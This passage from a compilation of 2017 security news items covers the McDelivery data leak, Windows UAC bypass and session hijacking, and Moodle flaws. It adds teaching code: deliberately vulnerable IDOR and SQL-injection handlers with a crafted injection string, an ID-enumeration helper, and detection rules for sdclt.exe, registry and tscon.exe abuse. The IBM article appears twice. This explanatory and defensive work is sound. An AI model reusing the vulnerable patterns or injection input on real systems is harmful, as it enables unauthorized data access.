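sess=s1 GET /api/user/2 200
sess=s1 GET /api/user/3 200
sess=s2 GET /api/user/2 200
"""

LOG_RE = re.compile(r"sess=(\S+) GET /api/user/(\d+)")


def flag_enumeration(log_text: str, threshold: int = 2) -> list:
    """Sessions that requested more than `threshold` distinct user IDs.
    A legitimate client only ever asks for its own record, so any session
    touching several IDs is worth a look even after the ownership check."""
    seen = defaultdict(set)
    for m in LOG_RE.finditer(log_text):
        seen[m.group(1)].add(int(m.group(2)))
    return sorted(s for s, ids in seen.items() if len(ids) > threshold)


if __name__ == "__main__":
    print("vulnerable:", enumerate_ids(user_details_vulnerable, 2, range(1, 5)))  # [1, 2, 3]
    print("hardened:  ", enumerate_ids(user_details_hardened, 2, range(1, 5)))    # [2]
    print("flagged:   ", flag_enumeration(SAMPLE_LOG))                            # ['s1']
```

The ownership check is the actual fix; switching to random, non-sequential identifiers only slows enumeration down and is worth doing in addition, not instead. The log check is cheap to run retrospectively, which matters here because the article reports the endpoint stayed open for weeks after disclosure.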

The vulnerability was discovered and disclosed on Feb. 7, and Fallible received an acknowledgement from a Senior IT Manager at McDonald’s on Feb. 13, but the issue was addressed only last week, it seems. According to Fallible, moreover, McDonald’s fix was neither released in a timely manner nor complete.

“We have always respected a company's request if they wanted more time to fix any issue but sadly they stopped responding after 4 weeks which led to us warning users that their data is out in the open. In fact, the 'fix' applied right now is incomplete and the vulnerability exists even now and we have intimated the same to the concerned company,” Anand told us.

Over the weekend, McDonald's published a statement on Facebook, saying that it has released an updated iteration of the McDelivery application and that it is prompting all users to update as soon as possible, as a precautionary measure.

“We would like to inform our users that our website and app does not store any sensitive financial data of the users like credit card details, wallets passwords or bank account information. The website and app has always been safe to use, and we update security measure on regular basis. As a precautionary measure, we would also urge our users to update the McDelivery app on their devices,” the statement reads.

According to Fallible, many companies in India ignore user data protection, mainly because there are no strong data protection and privacy laws or penalties. Furthermore, “there is a similar lack of push from non-government organizations to improve this scenario,” the company says. In the past, the security firm has discovered over 50 instances of data leaks in several Indian organizations.

In January, Fallible revealed that many third-party applications unnecessarily store keys or secrets that could allow attackers to access and leak data related to some of the most popular online services, including Twitter, Flickr, Dropbox, Slack, and Uber, as well as Amazon AWS (Amazon Web Services).


Fileless Attack Can Bypass User Account Control in Windows 10

21.3.2017 securityweek Virus
A recently disclosed User Account Control (UAC) bypass that leverages App Paths can be used for fileless attacks as well, security researcher Matt Nelson now says.

Last week the researcher revealed that App Paths and the Backup and Restore tool (sdclt.exe) in Windows 10 can be abused to bypass the UAC because sdclt.exe auto-elevates due to its manifest. Nelson published a proof-of-concept (PoC) script to demonstrate the attack, but warned that, because parameters weren’t supported, the payload had to be saved on the disk.

Nelson, who has a history of revealing UAC bypass techniques (such as last year’s Event Viewer and Disk Cleanup methods), now reveals that fileless attacks abusing the App Paths UAC bypass are possible as well. As before, however, the attack is possible only on Windows 10, because sdclt.exe’s manifest in previous releases prevents it from auto-elevating when started from medium integrity.

The researcher explains that, while analyzing the sdclt.exe binary to look for command line arguments, he discovered that, if a specific argument was used, a parameter could be added to sdclt.exe, which would be executed with elevated privileges.

The researcher published a PoC on GitHub to demonstrate the bypass and explains that the script takes a full path to the payload and any parameters. Moreover, it automatically adds the necessary keys, starts ‘sdclt.exe /kickoffelev,’ and then erases traces of the attack.

As before, the attack can be prevented by setting the UAC level to ‘Always Notify’ or by removing the current user from the Local Administrators group. The researcher notes that looking for new registry entries in HKCU:\Software\Classes\exefile\shell\runas\command\isolatedCommand is a good method of monitoring the system for this type of attack.


Hacked Websites on the Rise: Google

21.3.2017 securityweek Hacking
Google painted a bleak picture of cybersecurity trends Monday, saying the number of websites hacked rose 32 percent last year, with little relief in sight.

"We don't expect this trend to slow down. As hackers get more aggressive and more sites become outdated, hackers will continue to capitalize by infecting more sites," Google said in a post on its webmaster blog.

Google, which inserts security warnings when it detects hacked sites, said most of those warned can clean up their pages, but that 61 percent are not notified because their sites are not verified by the search engine.

"As always, it's best to take a preventative approach and secure your site rather than dealing with the aftermath," the blog said. "Remember a chain is only as strong as its weakest link."

The news comes amid growing concerns over cybersecurity in the wake of massive hacks affecting Yahoo, the US government and major e-commerce firms.

Google said certain website hacks often follow similar patterns -- some insert "gibberish" on a page, while others create Japanese text that links to fake brand merchandise sites.

"Hacking behavior is constantly evolving, and research allows us to stay up to date on and combat the latest trends," Google said.


McDonald’s McDelivery app leaks details of over 2.2 million customers
21.3.2017 securityaffairs Crime

The McDelivery application used by McDonald’s customers in India was found to be leaking the personal data of more than 2.2 million users.
McDelivery is a web application used by McDonald’s customers in India that was found to be leaking the personal information of more than 2.2 million users.


The issue was discovered by researchers at security startup Fallible, who discovered that the application was leaking user data, including names, email addresses, phone numbers, home addresses, home co-ordinates, and social profile links.

“The McDonald’s India app, McDelivery is leaking personal data for more than 2.2 million of its users which include name, email address, phone number, home address, accurate home co-ordinates and social profile links,” reads the blog post published by Fallible.

The data leak in the McDelivery app is the result of an unprotected publicly accessible API endpoint that was designed to deliver user details, which is coupled with serially enumerable integers as customer IDs.

The API Endpoint is:

http://services.mcdelivery.co.in/ProcessUser.svc/GetUserProfile

The experts also shared a sample response to a curl request against this endpoint.

An attacker can exploit the issue to enumerate all the users of the application and access related data.

The application fails to check if the user ID requested via the API is the same user who has logged in. The user ID is a plain number that starts from 1 and can be enumerated by an attacker to retrieve data of the users.
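The access-control mistake described above, as an added example that is neither Fallible's analysis code nor McDonald's application code: a minimal profile lookup written the insecure way (the client-supplied id is trusted) beside two corrected versions. The user table, the Session type, the function names and the sample values are all constructed for this illustration.

```python
# Added example (not McDonald's or Fallible's code): a profile lookup that trusts
# a client-supplied user id, beside the corrected versions. All data is constructed.
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

# Constructed stand-in for a user profile table keyed by a sequential integer id.
USERS: Dict[int, dict] = {
    1: {"name": "Alice Example", "email": "alice@example.invalid", "phone": "000-0001"},
    2: {"name": "Bob Example", "email": "bob@example.invalid", "phone": "000-0002"},
    3: {"name": "Carol Example", "email": "carol@example.invalid", "phone": "000-0003"},
}


@dataclass
class Session:
    """Authenticated session: the server already knows which user is logged in."""
    user_id: int


class Forbidden(Exception):
    """Raised when a caller asks for a record that is not theirs."""


def get_user_profile_vulnerable(session: Session, requested_id: int) -> Optional[dict]:
    """Insecure: returns whatever id the client asked for without comparing it to
    the session. Because ids are small sequential integers, any logged-in user can
    walk 1, 2, 3, ... and read every profile (an insecure direct object reference)."""
    return USERS.get(requested_id)


def get_user_profile_fixed(session: Session, requested_id: int) -> Optional[dict]:
    """Secure: the authorization check binds the requested record to the caller.
    The check runs before the lookup, so the response does not reveal whether a
    foreign id exists at all."""
    if requested_id != session.user_id:
        raise Forbidden("requested profile does not belong to the authenticated user")
    return USERS.get(requested_id)


def get_my_profile(session: Session) -> Optional[dict]:
    """Simplest fix: accept no id from the client and derive it from the session."""
    return USERS.get(session.user_id)


def readable_profile_ids(fetch: Callable[[Session, int], Optional[dict]],
                         session: Session, max_id: int) -> List[int]:
    """Measure exposure: which ids in 1..max_id can a single session read through
    the given handler? Used here only to contrast the two implementations."""
    readable = []
    for uid in range(1, max_id + 1):
        try:
            if fetch(session, uid) is not None:
                readable.append(uid)
        except Forbidden:
            continue
    return readable


if __name__ == "__main__":
    bob = Session(user_id=2)
    print("vulnerable handler exposes:", readable_profile_ids(get_user_profile_vulnerable, bob, 5))
    print("fixed handler exposes:     ", readable_profile_ids(get_user_profile_fixed, bob, 5))
```

The point of `readable_profile_ids` is the contrast: through the vulnerable handler one session reads every existing profile, through the fixed handler only its own. Of the two fixes, `get_my_profile` is preferable for a "current user" endpoint because there is no id parameter left to get wrong.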

The issue was reported on Feb. 7, and a Senior IT Manager at McDonald’s confirmed the vulnerability on Feb. 13. The company addressed the vulnerability last week, but according to the experts at Fallible, the fix was incomplete.

“The McDonald’s fix is incomplete and the endpoint is still leaking data. We have communicated this again to them and are waiting for their response.” continues the analysis.

Just after the release of the patch, McDonald’s published a statement on its Facebook page to announce the update and prompting users to update the application as soon as possible.

“We would like to inform our users that our website and app does not store any sensitive financial data of the users like credit card details, wallets passwords or bank account information. The website and app has always been safe to use, and we update security measure on regular basis.” reads the statement issued by McDonald’s. “As a precautionary measure, we would also urge our users to update the McDelivery app on their devices.”


Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password
20.3.2017 thehackernews Hacking
You may be aware of the fact that a local Windows user with system rights and permissions can reset the password for other users, but did you know that a local user can also hijack other users' sessions, including those of domain admin/system users, without knowing their passwords?
Alexander Korznikov, an Israeli security researcher, has recently demonstrated that a local privileged user can even hijack the session of any logged-in Windows user who has higher privileges without knowing that user's password, using built-in command line tools.
This trick works on almost all versions of the Windows operating system and does not require any special privileges. Korznikov himself is unsure whether it is a Windows feature or a security flaw.
The issue discovered by Korznikov is not entirely new, as a French security researcher, namely Benjamin Delpy, detailed a similar user session hijacking technique on his blog some six years ago.
Korznikov calls the attack a "privilege escalation and session hijacking," which could allow an attacker to hijack high-privileged users' session and gain unauthorized access to applications and other sensitive data.
For successful exploitation, an attacker requires physical access to the targeted machine, but using a Remote Desktop Protocol (RDP) session on an already compromised machine, the attack can be performed remotely as well.
Video Demonstrations and PoC Exploit Released!
Korznikov has also provided a few video demonstrations of a successful session hijacking (using Task manager, service creation, as well as command line), along with Proof-of-Concept (PoC) exploit.
Korznikov successfully tested the flaw on the newest Windows 10, Windows 7, Windows Server 2008 and Windows Server 2012 R2, though another researcher confirmed on Twitter that the flaw works on every Windows version, even if the workstation is locked.
While Microsoft does not deem it to be a security vulnerability and some experts argued that a Windows user with administrative permissions can do anything, Korznikov explained a simple attack scenario to explain how a malicious insider can easily misuse this flaw:
"Some bank employee has access to the billing system and its credentials to log in. One day, he comes to work, logs into the billing system and starts to work. At lunchtime, he locks his workstation and goes out for lunch. Meanwhile, the system administrator can use this exploit to access the employee's workstation."
"According to the bank's policy, the administrator's account should not have access to the billing system, but with a couple of built-in commands in Windows, this system administrator will hijack the employee's desktop, which he left locked. From now on, a sysadmin can perform malicious actions in the billing system as the billing employee account."
Alternatively, an attacker could dump system memory to retrieve users' passwords in plaintext, but that is a long and complicated process compared to simply running tscon.exe with a session number, which leaves no trace and needs no external tool.
The issue has been known to Microsoft for the last six years, so it is likely the company does not consider it a security flaw, since it requires local admin rights on the computer, and deems this to be how its operating system is supposed to behave.
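Both of the Windows techniques above leave host telemetry that a defender can watch for: the App Paths bypass writes the isolatedCommand registry value and launches sdclt.exe with /kickoffelev, and the session switch is a tscon.exe process started with a session number. The detector below is an added example, not code from Nelson or Korznikov; it scans constructed log lines written in a simplified key=value form that borrows Sysmon's field names (EventID 1 for process creation, EventID 13 for a registry value being set) rather than real Sysmon output. The rule names and the sample accounts and paths are invented for the illustration.

```python
# Added example (not Nelson's or Korznikov's code): a small detector that scans
# process-creation and registry-write telemetry for the two Windows techniques
# described above. The log lines are constructed in a simplified key=value form
# with Sysmon-style field names (EventID 1 = process create, 13 = registry value set).
import re
from typing import Dict, List, Optional

SAMPLE_EVENTS = r"""
EventID=1|User=CORP\jdoe|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe notes.txt
EventID=13|User=CORP\jdoe|Image=C:\Windows\System32\reg.exe|TargetObject=HKU\S-1-5-21-1-2-3-1001\Software\Classes\exefile\shell\runas\command\isolatedCommand
EventID=1|User=CORP\jdoe|Image=C:\Windows\System32\sdclt.exe|CommandLine=sdclt.exe /kickoffelev
EventID=1|User=CORP\sysadmin|Image=C:\Windows\System32\tscon.exe|CommandLine=tscon.exe 2
EventID=1|User=CORP\sysadmin|Image=C:\Windows\System32\query.exe|CommandLine=query user
"""

# Registry path from the sdclt.exe write-up above; HKCU is reported under HKU\<SID>
# in Sysmon telemetry, so match on the path suffix, case-insensitively.
UAC_KEY_SUFFIX = r"\software\classes\exefile\shell\runas\command\isolatedcommand"

# tscon.exe followed by a numeric session id (the session switch described above).
TSCON_SESSION_RE = re.compile(r'tscon(?:\.exe)?"?\s+(\d+)\b', re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Split one constructed 'key=value|key=value' line into a field map."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return a rule name if the event matches one of the techniques, else None."""
    event_id = event.get("EventID")
    image = event.get("Image", "").lower()
    cmdline = event.get("CommandLine", "")
    if event_id == "13" and event.get("TargetObject", "").lower().endswith(UAC_KEY_SUFFIX):
        return "uac-bypass-isolatedcommand-key-written"
    if event_id == "1" and image.endswith("\\sdclt.exe") and "/kickoffelev" in cmdline.lower():
        return "sdclt-kickoffelev-launch"
    if event_id == "1" and image.endswith("\\tscon.exe") and TSCON_SESSION_RE.search(cmdline):
        return "tscon-session-switch"
    return None


def detect(log_text: str) -> List[Dict[str, Optional[str]]]:
    """Run every non-empty line through classify() and collect the hits."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        rule = classify(event)
        if rule is not None:
            findings.append({"rule": rule, "user": event.get("User"), "image": event.get("Image")})
    return findings


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The registry rule is the one the write-up itself recommends; the sdclt.exe and tscon.exe rules fire on legitimate administrative use as well, so in practice they are triage signals to be correlated with who ran them and whether a workstation was locked at the time, not blocking rules.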


IBM and SecureKey Announce Blockchain-Based Identity Verification

20.3.2017 securityweek Safety
The blockchain promise took a step closer to fruition today with IBM and SecureKey making a joint announcement of a blockchain-based digital identity network.

Built on the Linux Foundation's open source Hyperledger Fabric v1.0 and the IBM Blockchain service, a new digital identity and attribute sharing network will go live in Canada later in 2017.

SecureKey Technologies is a Toronto-based identity and authentication provider. It had already decided that it didn't want to use a central broker-based system to hold identities, because that would be a huge target for hackers. Nor did it want to be in the position of handing out too much personal data to everyone who demanded it.

"Right now, I would argue a driver's license shares too much," explains Greg Wolfond, founder and CEO of SecureKey. "A girl goes to a bar, and she has to share her name, address and weight with the bouncer. That's crazy. All he needs to know is that she's over 21. How to make this work electronically we couldn’t solve well until we saw it on Hyperledger."

The new service, currently consumer-centric, will work with the trust people have in their bank. It will start in Canada, but both IBM and SecureKey intend to take it global. Leading Canadian banks, including BMO, CIBC, Desjardins, RBC, Scotiabank and TD, joined the digital identity ecosystem in October, 2016, and collectively invested $27M in SecureKey.

The result is a bank-verified identity that can be used via a mobile app provided by the bank. Users will be able to control what identifying information they share from the blockchain stored trusted credentials to the organizations of their choice, and for those organizations to quickly validate the user's identity to arrange new services. For example, once the users have proven their identity with their bank and a credit agency, they can grant permission to share only specified data with a utility to create a new account.

"What IBM is building with SecureKey and members of the digital identity ecosystem in Canada, including major banks, telecom companies and government agencies, will help tackle the toughest challenges surrounding identity," said Marie Wieck, general manager, IBM Blockchain. "This method is an entirely different approach to identity verification, and together with SecureKey, we have a head start on putting it on the blockchain. This is a prime example of the type of innovation permissioned blockchain networks can accelerate."

Personal data is one of the most highly regulated areas of computing. European laws, which will apply to European data regardless of the nationality of the data-holding organization, have two particularly difficult concepts: firstly, that only the required amount of personal data is held, and secondly, that users have a right to have that data removed.

The ability to provide only the required data for identification in each different circumstance goes a long way to satisfy the first problem. The second is, under normal circumstances, more difficult. The blockchain was originally designed to be immutable, with the effect that Europe's 'right-to-be-forgotten' could not be applied.

IBM claims to have solved this problem. Jerry Cuomo, IBM's vice-president of blockchain technologies, said that IBM has solved this problem while still adhering to Blockchain immutability. "We do have a patent pending, so I don't want to go into too much detail," he said. "But we solved it without deleting from the blockchain, which is pretty cool."

The system solves some, but not all, of the identity problems described and solved by the Global Identity Foundation's Identity 3 project. The big advantage is that it provides only the necessary elements of personal identity to prove personal identity in each instance. This is similar to Identity 3. Where it differs, however, is that the totality of the personal data is still under the control of a single organization. A basic principle of Identity 3 is 'anonymity at the root of identity'; and this clashes with the concept of bank-based verification.

It also ultimately limits the global potential of the system: individual governments will still be able to access the data. This will be of limited importance to most users where it is their own government able to access their data; but (unless solved) would prevent the expansion of the system across national borders. To expand globally, IBM and SecureKey may be forced to offer localized versions in different countries.

Identity 3's anonymity at the root of identity split across multiple verifiers solves this issue. At a technical level, Chinese Identity 3 identities could be trusted within the US, and American Identity 3 identities could be trusted in China. This is unlikely to happen with a Canada-based blockchain system.

Despite these limitations, the SecureKey IBM Blockchain solution offers huge potential. For the moment it is described as a 'consumer' solution. Over time we can expect it to expand. "You have to solve for individual identity first but then it is very applicable to businesses," Wolfond told SecurityWeek. "We are already engaging in a few projects to bring business use to life."




New Bill Forces Cybersecurity Responsibility Into the Boardroom

20.3.2017 securityweek Cyber

Cybersecurity Disclosure Act of 2017 Forces Cybersecurity Responsibility Into the Boardroom

The need for board-level responsibility for cyber security is generally accepted but not always applied. A new bill introduced to the Senate seeks to change this by requiring a board level statement of cyber security expertise or practice in annual SEC filings.

S536, cited as the 'Cybersecurity Disclosure Act of 2017', is sponsored by Democrats Mark Warner of Virginia and Jack Reed of Rhode Island, and Republican Susan Collins of Maine. Its purpose is to promote transparency in the oversight of cybersecurity risks at publicly traded companies.

The bill (PDF) defines a cyber security threat as any action not protected by the First Amendment that "may result in an unauthorized effort to adversely impact the security, availability, confidentiality, or integrity of an information system or information that is stored on, processed by, or transiting an information system..."

The bill then proposes just three requirements under the aegis of the Securities and Exchange Commission (SEC): that annual reports to the SEC must disclose the level of cyber security expertise of the board; or, if none exists, what "other cybersecurity steps taken by the reporting company were taken into account"; and that the definition of what constitutes that expertise should come from the SEC in consultation with NIST.

"It is in the best interest of consumers and shareholders for companies to fully disclose the plans they've set in place to defend against [data breaches]," Warner said in a statement announcing the legislation. "This legislation provides needed transparency in an often-shrouded process that directly affects the privacy of millions, and will serve as tool to urge other entities to follow through on establishing a reliable strategy to counter cyberattacks."

The effect of the bill will be to make the board legally and transparently responsible for cyber security. It is not the first regulation to seek this effect in 2017. On 1 March, the New York Department of Financial Services' 23 NYCRR 500 regulation came into force. That regulation imposes a responsibility for regulated organizations to name a 'CISO' who will provide an annual cyber security report to be submitted and signed off by the board to the regulator.

Taken together, these two examples of new regulations suggest that regulatory authorities are no longer satisfied to make recommendations about board-level security responsibility, but are now ready to mandate and legally require it.

The implication is that having security expertise on the board is no longer merely advisable; it will increasingly become a legal requirement.


Serious Flaws Found in Moodle Learning Platform

20.3.2017 securityweek Vulnerability
Researchers have discovered serious vulnerabilities in Moodle, a popular open-source learning platform used by many top universities in the United States, the United Kingdom and other countries around the world.

Moodle updates released last week address a total of four vulnerabilities, including two that have a “serious” severity/risk rating and two classified as “minor.”

One of the serious flaws, tracked as CVE-2017-2641, can be exploited by an attacker to execute arbitrary PHP code on a vulnerable Moodle server. While the security hole is tracked as a single issue, Netanel Rubin, the expert who discovered the problem, says an attack is possible due to several smaller weaknesses affecting the platform.

The flaw can be exploited by an authenticated attacker to conduct an SQL injection attack via user preferences and add a new administrator user to the system. Once the attacker has an admin account on the system, they can execute arbitrary code by uploading a new plugin or a template to the server, Rubin said.
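A generic illustration of the flaw class named above (SQL injection through a user-controlled preference value), added here as an example: it is not Moodle's code and does not reproduce Rubin's findings. A preference lookup built by string formatting is shown beside a parameterized version with an allow-list on the preference name; the table layout, the rows, the function names and the allow-list pattern are constructed for the illustration.

```python
# Added example (not Moodle's code): the class of defect behind the Moodle issue,
# a preference lookup built by string formatting, beside the parameterized
# version. Table layout, rows and names are constructed for this example.
import re
import sqlite3
from typing import List

PREF_NAME_RE = re.compile(r"[a-z][a-z0-9_]{0,63}")  # constructed allow-list for preference names


def is_valid_pref_name(name: str) -> bool:
    """Preference names are identifiers, never free text; reject anything else."""
    return PREF_NAME_RE.fullmatch(name) is not None


def build_db() -> sqlite3.Connection:
    """In-memory table standing in for a per-user preferences store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_preferences (userid INTEGER, name TEXT, value TEXT)")
    conn.executemany(
        "INSERT INTO user_preferences VALUES (?, ?, ?)",
        [
            (1, "theme", "dark"),
            (1, "recovery_code", "CONSTRUCTED-SECRET-1"),  # belongs to user 1 only
            (2, "theme", "light"),
        ],
    )
    conn.commit()
    return conn


def get_pref_vulnerable(conn: sqlite3.Connection, userid: int, name: str) -> List[str]:
    """Insecure: the caller-controlled name is pasted into the SQL text, so a
    quote inside it rewrites the WHERE clause and the userid restriction is lost."""
    sql = (f"SELECT value FROM user_preferences WHERE userid = {userid} "
           f"AND name = '{name}' ORDER BY userid")
    return [row[0] for row in conn.execute(sql)]


def get_pref_safe(conn: sqlite3.Connection, userid: int, name: str) -> List[str]:
    """Secure: bound parameters keep the name as data (this alone stops the
    injection); the allow-list is defense in depth that rejects implausible
    names before any query runs."""
    if not is_valid_pref_name(name):
        raise ValueError("invalid preference name")
    sql = "SELECT value FROM user_preferences WHERE userid = ? AND name = ? ORDER BY userid"
    return [row[0] for row in conn.execute(sql, (userid, name))]


def set_pref_safe(conn: sqlite3.Connection, userid: int, name: str, value: str) -> None:
    """The write path must be parameterized too; the value is stored verbatim,
    quotes and all, without ever becoming part of the SQL text."""
    if not is_valid_pref_name(name):
        raise ValueError("invalid preference name")
    conn.execute("INSERT INTO user_preferences VALUES (?, ?, ?)", (userid, name, value))
    conn.commit()


if __name__ == "__main__":
    db = build_db()
    crafted = "theme' OR userid = 1 AND name = 'recovery_code"
    print("vulnerable:", get_pref_vulnerable(db, 2, crafted))
    try:
        get_pref_safe(db, 2, crafted)
    except ValueError as exc:
        print("safe:", exc)
```

Run as a script, the vulnerable lookup for user 2 returns user 1's secret alongside user 2's own theme, while the safe version refuses the name outright; had the allow-list not been there, the bound parameter would simply have matched no row.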

This vulnerability affects Moodle 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and older versions, and it has been fixed with the release of versions 3.2.2, 3.1.5, 3.0.9 and 2.7.19.

Moodle developers noted that the flaw can only be exploited in Moodle versions prior to 3.2 by users with manager or admin rights. In version 3.2, the attack works with any type of user account, including teacher and student accounts.

Rubin, who recently warned that vulnerabilities in smart electricity meters expose consumers and electric utilities to cyberattacks, has published a lengthy blog post detailing his findings.

The second serious flaw patched by Moodle last week has been described as a cross-site scripting (XSS) flaw in the functionality that allows users to attach files for evidence of prior learning.

“Serving files attached to evidence of prior learning did not force download. When viewed by other users they would be opened in current moodle sessions,” Moodle wrote in its advisory.

The flaw, reported by a researcher who uses the online moniker “wez3” and tracked as CVE-2017-2645, only affects versions 3.2 to 3.2.1 and 3.1 to 3.1.4.

Jaymark Pestaño discovered a less severe XSS vulnerability in the evidence of prior learning section, and Nadav Kavalerchik identified an issue related to usernames being displayed in global search for unauthenticated users. Both issues are considered minor.


Microsoft Started Blocking Windows 7/8.1 Updates For PCs Running New Processors
20.3.2017 thehackernews Security

You might have heard the latest news about Microsoft blocking new security patches and updates for Windows 7 and Windows 8.1 users running the latest processors from Intel, AMD, Qualcomm, and others.
Don't panic, this new policy doesn't mean that all Windows 7 and 8.1 users will not be able to receive latest updates in general because Microsoft has promised to support Windows 7 until 2020, and Windows 8.1 until 2023.
But those who have upgraded their machines running older versions of Windows to the latest processors, or manually downgraded their new laptops to run Windows 7/8.1 would be out of luck.
A recently published Microsoft Knowledge Base article suggests that if you are running the older version of operating systems on your computers that feature new processors, including Intel's 7th generation Core i3, i5 and i7 ("Kaby Lake"), AMD Ryzen ("Bristol Ridge") and Qualcomm 8996 chips or later, the security updates will not install.
Instead, you will see error messages when using Windows Update to get patches for Windows 7 and Windows 8.1. The error messages read:
"Unsupported Hardware.
Your PC uses a processor that is not supported on this version of Windows, and you will not receive updates."
"Windows could not search for new updates. An error occurred while checking for new updates for your computer. Error(s) found: Code 80240037 Windows Update encountered an unknown error."
So, What's the Solution? (According to Microsoft)
Users would need to upgrade their systems to the newest version of Windows, i.e. Windows 10, despite Windows 7 being supported until 2020 and Windows 8.1 until 2023.
Microsoft announced this limitation in January 2016, when the company said making Windows 7 and Windows 8.1 OSes run on the latest processors was "challenging."
"For Windows 7 to run on any modern silicon, device drivers and firmware need to emulate Windows 7's expectations for interrupt processing, bus support, and power states - which is challenging for WiFi, graphics, security, and more," Terry Myerson, VP of Microsoft's Windows and Devices Group, said last year.
The initial announcement also included PCs that use 6th-generation Intel processors ("Skylake"), but Microsoft backed off on its plan and released a list of Skylake-based systems that will be fully supported to receive security updates through the official end of support phase for Windows 7 and Windows 8.1, i.e. January 14, 2020, and January 10, 2023, respectively.
Microsoft Indirectly forcing users to adopt Windows 10
This end of updates for new devices doesn't come as a surprise to some PC owners, as Microsoft is making every effort to run its latest Windows on all Windows computers since the launch of Windows 10.
An alarm for those still running Windows Vista on their machines: The operating system will no longer receive security updates, non-security hotfixes, paid assisted supports, or online technical updates from Microsoft beginning April 11, 2017.
So, it's high time for Windows Vista users to upgrade their PCs to the latest version of the Windows operating system in order to protect their devices from malware and other security threats.
Ditch Windows for Linux; Try This:
No doubt Windows 10 has been viewed as a welcome successor to Windows 8, both by businesses and individuals, with more enhanced security features. But the OS has also come under scrutiny from those who are concerned about their privacy.
So why not switch to a free Windows 10 alternative? Privacy-conscious people can move to Linux operating systems, such as Ubuntu, a Debian-based OS and part of the open source Linux family, and Fedora, Red Hat's Linux distro with an estimated 1.2 million users.


IBM and SecureKey Announce Blockchain-Based Identity Verification

20.3.2017 securityweek Safety
The blockchain promise took a step closer to fruition today with IBM and SecureKey making a joint announcement of a blockchain-based digital identity network.

Built on the Linux Foundation's open source Hyperledger Fabric v1.0 and the IBM Blockchain service, a new digital identity and attribute sharing network will go live in Canada later in 2017.

SecureKey Technologies is a Toronto-based identity and authentication provider. It had already decided that it didn't want to use a central broker-based system to hold identities, because that would be a huge target for hackers. Nor did it want to be in the position of handing out too much personal data to everyone who demanded it.

"Right now, I would argue a driver's license shares too much," explains Greg Wolfond, founder and CEO of SecureKey. "A girl goes to a bar, and she has to share her name, address and weight with the bouncer. That's crazy. All he needs to know is that she's over 21. How to make this work electronically we couldn’t solve well until we saw it on Hyperledger."

The new service, currently consumer-centric, will work with the trust people have in their bank. It will start in Canada, but both IBM and SecureKey intend to take it global. Leading Canadian banks, including BMO, CIBC, Desjardins, RBC, Scotiabank and TD, joined the digital identity ecosystem in October, 2016, and collectively invested $27M in SecureKey.

The result is a bank-verified identity that can be used via a mobile app provided by the bank. Users will be able to control what identifying information they share from the blockchain stored trusted credentials to the organizations of their choice, and for those organizations to quickly validate the user's identity to arrange new services. For example, once the users have proven their identity with their bank and a credit agency, they can grant permission to share only specified data with a utility to create a new account.

"What IBM is building with SecureKey and members of the digital identity ecosystem in Canada, including major banks, telecom companies and government agencies, will help tackle the toughest challenges surrounding identity," said Marie Wieck, general manager, IBM Blockchain. "This method is an entirely different approach to identity verification, and together with SecureKey, we have a head start on putting it on the blockchain. This is a prime example of the type of innovation permissioned blockchain networks can accelerate."

Personal data is one of the most highly regulated areas of computing. European laws, which will apply to European data regardless of the nationality of the data-holding organization, have two particularly difficult concepts: firstly, that only the required amount of personal data is held, and secondly, that users have a right to have that data removed.

The ability to provide only the required data for identification in each different circumstance goes a long way to satisfy the first problem. The second is, under normal circumstances, more difficult. The blockchain was originally designed to be immutable, with the effect that Europe's 'right-to-be-forgotten' could not be applied.

IBM claims to have solved this problem while still adhering to blockchain immutability. "We do have a patent pending, so I don't want to go into too much detail," said Jerry Cuomo, IBM's vice-president of blockchain technologies. "But we solved it without deleting from the blockchain, which is pretty cool."

The system solves some, but not all, of the identity problems described and solved by the Global Identity Foundation's Identity 3 project. The big advantage is that it provides only the necessary elements of personal identity to prove personal identity in each instance. This is similar to Identity 3. Where it differs, however, is that the totality of the personal data is still under the control of a single organization. A basic principle of Identity 3 is 'anonymity at the root of identity'; and this clashes with the concept of bank-based verification.

It also ultimately limits the global potential of the system: individual governments will still be able to access the data. This will be of limited importance to most users where it is their own government able to access their data; but (unless solved) would prevent the expansion of the system across national borders. To expand globally, IBM and SecureKey may be forced to offer localized versions in different countries.

Identity 3's anonymity at the root of identity split across multiple verifiers solves this issue. At a technical level, Chinese Identity 3 identities could be trusted within the US, and American Identity 3 identities could be trusted in China. This is unlikely to happen with a Canada-based blockchain system.

Despite these limitations, the SecureKey IBM Blockchain solution offers huge potential. For the moment it is described as a 'consumer' solution. Over time we can expect it to expand. "You have to solve for individual identity first but then it is very applicable to businesses," Wolfond told SecurityWeek. "We are already engaging in a few projects to bring business use to life."


Mozilla Patches Firefox Flaw Disclosed at Pwn2Own

20.3.2017 securityweek Vulnerability

Mozilla has already patched a Firefox vulnerability disclosed last week at the Pwn2Own 2017 competition by a team of researchers from Beijing-based enterprise security firm Chaitin Tech.

The Chaitin Security Research Lab team hacked Firefox with a SYSTEM-level escalation and earned $30,000. The experts used an integer overflow to break Firefox and an uninitialized buffer flaw in the Windows kernel to escalate privileges.

The integer overflow vulnerability, rated critical and tracked as CVE-2017-5428, was patched on Friday with the release of Firefox 52.0.1. No other security fixes or improvements are included in this release.

“An integer overflow in createImageBitmap() was reported through the Pwn2Own contest,” Mozilla wrote in its advisory. “The fix for this vulnerability disables the experimental extensions to the createImageBitmap API. This function runs in the content sandbox, requiring a second vulnerability to compromise a user's computer.”

Firefox hacked at Pwn2Own 2017

Chaitin Security Research Labs hacks Firefox and runs notepad.exe as SYSTEM

Moritz Jodeit of Blue Frost Security also targeted Firefox at the Pwn2Own competition, but he failed to demonstrate his exploit chain in the allocated timeframe.

In addition to Firefox, the Chaitin Security Research Lab targeted Safari, macOS and Ubuntu, and earned a total of $90,000 for its exploits.

The white hat hackers who took part in Pwn2Own 2017 received a total of $833,000 for finding 51 vulnerabilities in Windows, macOS, Ubuntu, Firefox, Edge, Safari, Flash Player, Adobe Reader and VMware Workstation.

